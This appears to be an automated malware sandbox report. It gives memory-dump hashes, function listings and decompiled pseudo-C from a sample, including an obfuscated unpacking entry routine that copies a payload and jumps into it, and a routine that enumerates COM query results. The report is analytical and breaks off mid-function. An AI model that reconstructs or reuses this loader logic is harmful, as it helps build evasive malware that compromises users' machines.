0x10016fac
0x10016faf
0x10016fb8
0x10016fb8
0x10016fc2
0x10016fc8
0x10016fcb
0x10016fd2
0x10016fd2
0x10017385
0x10017385
0x10017388
0x1001738a
0x1001738f
0x1001739e
0x100173aa
0x100173af
0x100173af
0x100173a0
0x100173a0
0x100173a5
0x100173a5
0x100173a5
0x10017391
0x10017391
0x10017396
0x10017396
0x10017396
0x00000000
0x1001738f
0x10016f2e
0x10016f23
0x10016f26
0x100173b4
0x00000000
0x100173b4
0x00000000
0x100173b7
0x100173b7
0x100173bb
0x100173bb
0x100173bb
0x00000000
0x10016f04

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction ID: 19ea4171ef540987915d0cec5eb8a46f3379abd3e1abe8683e611fa232c1fce7
Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction Fuzzy Hash: EBF16E755092518FC709CF28C4948FA7BF1FF69310B1A82FDD8999B3A6D731A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030919A1, Relevance: .3, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			_entry_() {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t256;
				signed int _t257;
				signed int _t260;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				signed int _t285;
				signed int _t287;
				intOrPtr* _t288;
				void* _t290;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				intOrPtr* _t296;
				signed int _t297;
				signed int _t299;
				intOrPtr _t300;
				intOrPtr _t301;
				signed int _t302;
				signed int _t304;
				signed int _t305;
				void* _t306;
				signed int _t307;
				int _t308;
				signed int _t310;
				signed int _t329;
				void* _t355;
				signed int _t356;
				void* _t359;
				signed int _t361;
				signed int _t369;
				signed int _t379;
				void* _t381;
				signed int _t384;
				signed int _t395;
				signed int _t398;
				int* _t399;
				signed int* _t400;

				_push(0);
				_t395 = _t398;
				_t399 = _t398 + 0xfffffff4;
				_t257 = E030944AB(_t256, _t306, _t307, _t329, _t355, _t379);
				if(_t306 != _t257) {
					if( *(_t306 + 0x4333d8) == 0) {
						if( *(_t306 + 0x43384c) == 0) {
							_t305 =  *((intOrPtr*)(_t306 + 0x435a38))();
							_v12 = _t307;
							 *(_t306 + 0x43384c) =  *(_t306 + 0x43384c) & 0x00000000;
							 *(_t306 + 0x43384c) =  *(_t306 + 0x43384c) | _t307 ^ _v12 ^ _t305;
							_t307 = _v12;
						}
						_push( *((intOrPtr*)(_t306 + 0x433490)));
						if( *(_t306 + 0x43342c) == 0) {
							_t304 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x43325c);
							 *(_t306 + 0x43342c) =  *(_t306 + 0x43342c) & 0x00000000;
							 *(_t306 + 0x43342c) =  *(_t306 + 0x43342c) ^ _t369 ^  *_t399 ^ _t304;
							_t369 = _t369;
						}
						_push(0xffffffde);
						if( *(_t306 + 0x4332f8) == 0) {
							_t302 =  *((intOrPtr*)(_t306 + 0x435a34))();
							 *(_t306 + 0x4332f8) =  *(_t306 + 0x4332f8) & 0x00000000;
							 *(_t306 + 0x4332f8) =  *(_t306 + 0x4332f8) | _t329 & 0x00000000 ^ _t302;
							_t329 = _t329;
						}
						_t257 =  *((intOrPtr*)(_t306 + 0x435a4c))(0xffffffff);
						_v20 = _t329;
						 *(_t306 + 0x4333d8) =  *(_t306 + 0x4333d8) & 0x00000000;
						 *(_t306 + 0x4333d8) =  *(_t306 + 0x4333d8) | _t329 - _v20 ^ _t257;
						_t329 = _v20;
					}
					_push(0x25);
					if( *(_t306 + 0x43326c) == 0) {
						_t257 =  *((intOrPtr*)(_t306 + 0x435a2c))();
						_v12 = _t329;
						 *(_t306 + 0x43326c) =  *(_t306 + 0x43326c) & 0x00000000;
						 *(_t306 + 0x43326c) =  *(_t306 + 0x43326c) | _t329 & 0x00000000 | _t257;
						_t329 = _v12;
					}
					_t290 = L03092E68(_t257, _t306, _t307, _t329, _t369);
					_push(0x40);
					_push(0x1000);
					if( *((intOrPtr*)(_t306 + 0x433130)) == 0) {
						_t301 =  *((intOrPtr*)(_t306 + 0x435a54))(0xea, _t307, _t290, 0x13, 0x400);
						_v16 = _t379;
						 *((intOrPtr*)(_t306 + 0x433130)) = _t301;
						_t379 = _v16;
					}
					if( *(_t306 + 0x433304) == 0) {
						if( *((intOrPtr*)(_t306 + 0x433344)) == 0) {
							_t300 =  *((intOrPtr*)(_t306 + 0x435a2c))();
							 *_t399 = _t369;
							 *((intOrPtr*)(_t306 + 0x433344)) = _t300;
							_t369 = 0;
						}
						_t296 = _t306 + 0x433730;
						_push(_t296);
						 *_t296 = 0x14;
						if( *(_t306 + 0x433350) == 0) {
							_t299 =  *((intOrPtr*)(_t306 + 0x435a30))(_t306 + 0x4330ec);
							 *(_t306 + 0x433350) =  *(_t306 + 0x433350) & 0x00000000;
							 *(_t306 + 0x433350) =  *(_t306 + 0x433350) | _t395 ^  *_t399 ^ _t299;
							_t395 = _t395;
						}
						_t297 =  *((intOrPtr*)(_t306 + 0x435a50))();
						 *_t399 = _t369;
						 *(_t306 + 0x433304) = 0 ^ _t297;
						_t369 = 0;
					}
					_push( *(_t306 + 0x433058));
					_push(0);
					if( *(_t306 + 0x4330d8) == 0) {
						_t295 =  *((intOrPtr*)(_t306 + 0x435a5c))(0xffffffff,  *((intOrPtr*)(_t306 + 0x43337c)), 0xffffffff,  *((intOrPtr*)(_t306 + 0x433018)));
						_push(_t369);
						 *(_t306 + 0x4330d8) =  *(_t306 + 0x4330d8) & 0x00000000;
						 *(_t306 + 0x4330d8) =  *(_t306 + 0x4330d8) | _t369 & 0x00000000 ^ _t295;
					}
					_t257 =  *((intOrPtr*)(_t306 + 0x435a10))();
					if( *(_t306 + 0x43320c) == 0) {
						if( *((intOrPtr*)(_t306 + 0x433658)) == 0) {
							 *_t79 =  *((intOrPtr*)(_t306 + 0x435a3c))(_t257);
							_push(_v12);
							_pop( *_t81);
							 *_t82 = 0;
							_t257 = _v16;
						}
						_push(_t257);
						_push( *((intOrPtr*)(_t306 + 0x4330d4)));
						_push(0xffffffff);
						_push(1);
						if( *(_t306 + 0x43386c) == 0) {
							_t293 =  *((intOrPtr*)(_t306 + 0x435a38))();
							_v16 = _t329;
							 *(_t306 + 0x43386c) =  *(_t306 + 0x43386c) & 0x00000000;
							 *(_t306 + 0x43386c) =  *(_t306 + 0x43386c) ^ (_t329 & 0x00000000 | _t293);
							_t329 = _v16;
						}
						_t291 =  *((intOrPtr*)(_t306 + 0x435a4c))();
						_v12 = _t307;
						 *(_t306 + 0x43320c) =  *(_t306 + 0x43320c) & 0x00000000;
						 *(_t306 + 0x43320c) =  *(_t306 + 0x43320c) | _t307 & 0x00000000 | _t291;
						_t307 = _v12;
						if( *(_t306 + 0x4338e4) == 0) {
							_t291 =  *((intOrPtr*)(_t306 + 0x435a2c))();
							 *_t399 = _t329;
							 *(_t306 + 0x4338e4) = 0 ^ _t291;
							_t329 = 0;
						}
						_t257 = _t291 & 0x00000000 ^  *_t399;
						_t399 = _t399 - 0xfffffffc;
					}
				}
				 *_t103 = _t257;
				_push(_v16);
				_pop(_t356);
				 *_t399 = _t257;
				 *(_t306 + 0x433154) = _t356;
				_t260 = 0;
				if( *(_t306 + 0x433780) == 0) {
					_t260 =  *((intOrPtr*)(_t306 + 0x435a28))(_t306 + 0x43330c);
					 *_t399 = _t329;
					 *(_t306 + 0x433780) = 0 ^ _t260;
					_t329 = 0;
				}
				if(_t306 > 0) {
					if( *(_t306 + 0x43322c) == 0) {
						_t288 = _t306 + 0x4335e8;
						 *_t288 = 0x14;
						_t260 =  *((intOrPtr*)(_t306 + 0x435a50))(_t288);
						_v20 = _t356;
						 *(_t306 + 0x43322c) =  *(_t306 + 0x43322c) & 0x00000000;
						 *(_t306 + 0x43322c) =  *(_t306 + 0x43322c) | _t356 & 0x00000000 | _t260;
						_t356 = _v20;
					}
					if( *(_t306 + 0x4332a8) == 0) {
						if( *(_t306 + 0x433610) == 0) {
							_t287 =  *((intOrPtr*)(_t306 + 0x435a28))(_t306 + 0x433284);
							_v16 = _t307;
							 *(_t306 + 0x433610) =  *(_t306 + 0x433610) & 0x00000000;
							 *(_t306 + 0x433610) =  *(_t306 + 0x433610) ^ (_t307 & 0x00000000 | _t287);
							_t307 = _v16;
						}
						_t282 = _t306 + 0x4334cc;
						if( *(_t306 + 0x433420) == 0) {
							_t285 =  *((intOrPtr*)(_t306 + 0x435a60))();
							 *_t399 = _t307;
							 *(_t306 + 0x433420) = 0 ^ _t285;
							_t307 = 0;
							 *_t133 = _t282;
							_t282 = _v20;
						}
						_push(_t282);
						if( *((intOrPtr*)(_t306 + 0x4334a4)) == 0) {
							_t284 =  *((intOrPtr*)(_t306 + 0x435a4c))( *((intOrPtr*)(_t306 + 0x43370c)), _t307, 1);
							_v12 = _t329;
							 *((intOrPtr*)(_t306 + 0x4334a4)) = _t284;
							_t329 = _v12;
						}
						_t260 =  *((intOrPtr*)(_t306 + 0x435a20))();
						if( *(_t306 + 0x4334e4) == 0) {
							_t283 =  *((intOrPtr*)(_t306 + 0x435a58))();
							 *(_t306 + 0x4334e4) =  *(_t306 + 0x4334e4) & 0x00000000;
							 *(_t306 + 0x4334e4) =  *(_t306 + 0x4334e4) ^ _t379 & 0x00000000 ^ _t283;
							_t379 = _t379;
							 *_t148 = _t260;
							_t260 = _v20;
						}
						_v12 = _t329;
						 *(_t306 + 0x4332a8) =  *(_t306 + 0x4332a8) & 0x00000000;
						 *(_t306 + 0x4332a8) =  *(_t306 + 0x4332a8) | _t329 & 0x00000000 ^ _t260;
						_t329 = _v12;
					}
					 *(_t306 + 0x433150) =  *(_t306 + 0x433150) + _t306;
					 *((intOrPtr*)(_t306 + 0x433010)) =  *((intOrPtr*)(_t306 + 0x433010)) + _t306;
					if( *(_t306 + 0x43339c) == 0) {
						_t260 =  *((intOrPtr*)(_t306 + 0x435a64))( *((intOrPtr*)(_t306 + 0x433024)), 0, 8);
						 *(_t306 + 0x43339c) =  *(_t306 + 0x43339c) & 0x00000000;
						 *(_t306 + 0x43339c) =  *(_t306 + 0x43339c) ^ _t329 & 0x00000000 ^ _t260;
						_t329 = _t329;
					}
				}
				_v20 = _t260;
				_t381 = _t379 & 0x00000000 ^ (_t260 ^ _v20 |  *(_t306 + 0x433150));
				if( *(_t306 + 0x4338d8) == 0) {
					_t281 =  *((intOrPtr*)(_t306 + 0x435a34))();
					_v12 = _t381;
					 *(_t306 + 0x4338d8) = 0 ^ _t281;
					_t381 = _v12;
				}
				if( *(_t306 + 0x4338f0) == 0) {
					if( *(_t306 + 0x4337ac) == 0) {
						_t280 =  *((intOrPtr*)(_t306 + 0x435a64))(0xffffffff, 0,  *((intOrPtr*)(_t306 + 0x43363c)));
						_v20 = _t307;
						 *(_t306 + 0x4337ac) = 0 ^ _t280;
						_t307 = _v20;
					}
					_t277 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x4332e8);
					if( *(_t306 + 0x433328) == 0) {
						_t278 =  *((intOrPtr*)(_t306 + 0x435a38))(_t277);
						_v20 = _t307;
						 *(_t306 + 0x433328) =  *(_t306 + 0x433328) & 0x00000000;
						 *(_t306 + 0x433328) =  *(_t306 + 0x433328) ^ (_t307 & 0x00000000 | _t278);
						_t277 =  *_t399;
						_t399 =  &(_t399[1]);
					}
					 *(_t306 + 0x4338f0) =  *(_t306 + 0x4338f0) & 0x00000000;
					 *(_t306 + 0x4338f0) =  *(_t306 + 0x4338f0) ^ (_t329 ^  *_t399 | _t277);
					_t329 = _t329;
				}
				_v16 = _t356;
				_t308 =  *(_t306 + 0x433058);
				_t359 = _v16;
				if( *(_t306 + 0x433638) == 0) {
					_t275 =  *((intOrPtr*)(_t306 + 0x435a20))(_t306 + 0x433048, _t308);
					 *(_t306 + 0x433638) =  *(_t306 + 0x433638) & 0x00000000;
					 *(_t306 + 0x433638) =  *(_t306 + 0x433638) | _t359 ^  *_t399 | _t275;
					_t359 = _t359;
					_t308 =  *_t399;
					_t399 = _t399 - 0xfffffffc;
				}
				asm("cld");
				_t264 = memcpy(_t359, _t381, _t308);
				_t400 =  &(_t399[3]);
				_t361 = _t381 + _t308 + _t308;
				 *_t400 = 0xfffff;
				_t310 = _t395;
				if( *(_t306 + 0x433094) == 0) {
					_t264 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x4331b8, _t310);
					_v20 = _t361;
					 *(_t306 + 0x433094) =  *(_t306 + 0x433094) & 0x00000000;
					 *(_t306 + 0x433094) =  *(_t306 + 0x433094) | _t361 - _v20 ^ _t264;
					_pop( *_t217);
					_t310 = _v20;
				}
				_v20 = _t381;
				_t266 = _t264 & 0x00000000 ^ _t381 - _v20 ^  *(_t306 + 0x433154);
				_t384 = _v20;
				_push(0x402037);
				if( *(_t306 + 0x43374c) == 0) {
					_t271 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x433464, _t310, _t266);
					_v12 = _t384;
					 *(_t306 + 0x43374c) =  *(_t306 + 0x43374c) & 0x00000000;
					 *(_t306 + 0x43374c) =  *(_t306 + 0x43374c) | _t384 - _v12 | _t271;
					_t310 =  *_t400;
					_t400 = _t400 - 0xfffffffc;
					_pop( *_t233);
					_t266 = 0 ^ _v20;
				}
				_pop( *_t235);
				 *(_t306 + 0x4338e8) =  *(_t306 + 0x4338e8) & _t310;
				if( *(_t306 + 0x433390) == 0) {
					_t268 =  *((intOrPtr*)(_t306 + 0x435a4c))(0xffffffff, 1, 1, _t266);
					_v20 = _t329;
					 *(_t306 + 0x433390) = _t268;
					_t329 = _v20;
					_t266 = (_t268 & 0x00000000) +  *_t400;
					_t400 = _t400 - 0xfffffffc;
				}
				 *(_t306 + 0x4338e8) =  *(_t306 + 0x4338e8) + _t266;
				if( *(_t306 + 0x433494) == 0) {
					_t267 =  *((intOrPtr*)(_t306 + 0x435a54))(0, 0xffffffff, 0xffffffff, _t400,  *((intOrPtr*)(_t306 + 0x4330a4)));
					_v16 = _t329;
					 *(_t306 + 0x433494) =  *(_t306 + 0x433494) & 0x00000000;
					 *(_t306 + 0x433494) =  *(_t306 + 0x433494) | _t329 ^ _v16 ^ _t267;
				}
				goto ( *(_t306 + 0x4338e8));
			}

0x030919a1
0x030919a4
0x030919a6
0x030919a9
0x030919b0
0x030919ef
0x030919fc
0x030919fe
0x03091a04
0x03091a0c
0x03091a13
0x03091a19
0x03091a19
0x03091a1c
0x03091a29
0x03091a32
0x03091a3e
0x03091a45
0x03091a4b
0x03091a4b
0x03091a4c
0x03091a55
0x03091a57
0x03091a63
0x03091a6a
0x03091a70
0x03091a70
0x03091a73
0x03091a79
0x03091a81
0x03091a88
0x03091a8e
0x03091a8e
0x03091a91
0x03091a9d
0x03091a9f
0x03091aa5
0x03091aad
0x03091ab4
0x03091aba
0x03091aba
0x03091abd
0x03091ac2
0x03091ac4
0x03091ad0
0x03091ae0
0x03091ae6
0x03091aed
0x03091af3
0x03091af3
0x03091afd
0x03091b06
0x03091b08
0x03091b10
0x03091b17
0x03091b1d
0x03091b1d
0x03091b1e
0x03091b24
0x03091b25
0x03091b32
0x03091b3b
0x03091b47
0x03091b4e
0x03091b54
0x03091b54
0x03091b55
0x03091b5d
0x03091b64
0x03091b6a
0x03091b6a
0x03091b6b
0x03091b71
0x03091b7a
0x03091b8c
0x03091b92
0x03091b98
0x03091b9f
0x03091ba5
0x03091ba6
0x03091bb3
0x03091bc0
0x03091bcc
0x03091bcf
0x03091bd2
0x03091bd8
0x03091bdb
0x03091bdb
0x03091bde
0x03091bdf
0x03091be5
0x03091be7
0x03091bf0
0x03091bf2
0x03091bf8
0x03091c00
0x03091c07
0x03091c0d
0x03091c0d
0x03091c10
0x03091c16
0x03091c1e
0x03091c25
0x03091c2b
0x03091c35
0x03091c37
0x03091c3f
0x03091c46
0x03091c4c
0x03091c4c
0x03091c53
0x03091c56
0x03091c56
0x03091bb3
0x03091c5a
0x03091c5d
0x03091c60
0x03091c63
0x03091c6a
0x03091c70
0x03091c78
0x03091c81
0x03091c89
0x03091c90
0x03091c96
0x03091c96
0x03091c9a
0x03091ca7
0x03091ca9
0x03091cb0
0x03091cb6
0x03091cbc
0x03091cc4
0x03091ccb
0x03091cd1
0x03091cd1
0x03091cdb
0x03091ce8
0x03091cf1
0x03091cf7
0x03091cff
0x03091d06
0x03091d0c
0x03091d0c
0x03091d0f
0x03091d1c
0x03091d1f
0x03091d27
0x03091d2e
0x03091d34
0x03091d35
0x03091d38
0x03091d38
0x03091d3b
0x03091d43
0x03091d4e
0x03091d54
0x03091d5b
0x03091d61
0x03091d61
0x03091d64
0x03091d71
0x03091d74
0x03091d80
0x03091d87
0x03091d8d
0x03091d8e
0x03091d91
0x03091d91
0x03091d94
0x03091d9c
0x03091da3
0x03091da9
0x03091da9
0x03091dac
0x03091db2
0x03091dbf
0x03091dcb
0x03091dd7
0x03091dde
0x03091de4
0x03091de4
0x03091dbf
0x03091de5
0x03091df4
0x03091e00
0x03091e02
0x03091e08
0x03091e0f
0x03091e15
0x03091e15
0x03091e1f
0x03091e28
0x03091e34
0x03091e3a
0x03091e41
0x03091e47
0x03091e47
0x03091e51
0x03091e5e
0x03091e61
0x03091e67
0x03091e6f
0x03091e76
0x03091e81
0x03091e84
0x03091e84
0x03091e8d
0x03091e94
0x03091e9a
0x03091e9a
0x03091e9b
0x03091ea6
0x03091ea8
0x03091eb2
0x03091ebc
0x03091ec8
0x03091ecf
0x03091ed5
0x03091ed8
0x03091edb
0x03091edb
0x03091ede
0x03091edf
0x03091edf
0x03091edf
0x03091ee2
0x03091ee9
0x03091ef1
0x03091efb
0x03091f01
0x03091f09
0x03091f10
0x03091f19
0x03091f1c
0x03091f1c
0x03091f1f
0x03091f2e
0x03091f30
0x03091f33
0x03091f3f
0x03091f4a
0x03091f50
0x03091f58
0x03091f5f
0x03091f6a
0x03091f6d
0x03091f72
0x03091f75
0x03091f75
0x03091f78
0x03091f7e
0x03091f8b
0x03091f94
0x03091f9a
0x03091fa1
0x03091fa7
0x03091fb0
0x03091fb3
0x03091fb3
0x03091fb6
0x03091fc3
0x03091fd2
0x03091fd8
0x03091fe0
0x03091fe7
0x03091fed
0x03091ff0

Memory Dump Source

Source File: 00000000.00000002.696598027.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52fd33336dbd82e60881b9d9d050ede990fd1616c71584f06ddeacaa9d7abf3e
Instruction ID: 8fb171b4085a8ca3c33556b236a9e516795c191843abd4c6b4598b0098c13e9d
Opcode Fuzzy Hash: 52fd33336dbd82e60881b9d9d050ede990fd1616c71584f06ddeacaa9d7abf3e
Instruction Fuzzy Hash: C4C16D71901204EFFF04DFA0C98A75977F5EF64326F18A1AADC1D9E18AC77812949F28

Uniqueness

Uniqueness Score: -1.00%

Function 10014FD0, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4898b2f6636ec9399df3118190717501385b1dd4ee858edb0113bdee0a687807
Instruction ID: d0537c4036237f79035386642b2d4391bf8eddd9ec583022d2bb6d93bec1c8e2
Opcode Fuzzy Hash: 4898b2f6636ec9399df3118190717501385b1dd4ee858edb0113bdee0a687807
Instruction Fuzzy Hash: FA7135B56205758FE708CF29DCD04653392E78A301787C52DEA628B3D5C635E727CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10011763, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58130296ee3e9968078918e0219af3fba735cb18b38036d537aa5c1a1c7b3f2
Instruction ID: efea62cd03dbdba979b5781a3b5613bf4c799b2b78296d361690321e43073893
Opcode Fuzzy Hash: a58130296ee3e9968078918e0219af3fba735cb18b38036d537aa5c1a1c7b3f2
Instruction Fuzzy Hash: 1C5168B3B041B00BDF5CCE3D8C642797ED25AC505670EC2BAE9A9CF24AE878C7059760

Uniqueness

Uniqueness Score: -1.00%

Function 10012351, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction ID: 93a3b517362ed5b43e545c9aefd21cc253981a7e3f3aaacb38cfda22b24e6f30
Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction Fuzzy Hash: 8C2162766154128BD35CDF2CD8A6A69F3A5FB48310F45427ED51BCB682CB71E492CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB47, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D52E(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E100085EA(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E10008600( &_v60, 0xfffffffe);
					E1000D5E2( &_v104);
					return _t320;
				}
				_t165 = E100095C7(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095C7(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092CB(_t165);
				_v60 = _t322;
				E100085BB( &_v52);
				E100085BB( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095C7(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085BB( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E10008600( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091C9(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091C9(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E1000867E(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100085EA( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E10008600(_t136, 0);
								E10008600( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091C9(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095C7(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095C7(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085BB( &_v92);
											E100085BB( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009626();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095C7(_t283, 0x219);
										E10009626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085BB( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091C9(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA2B( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
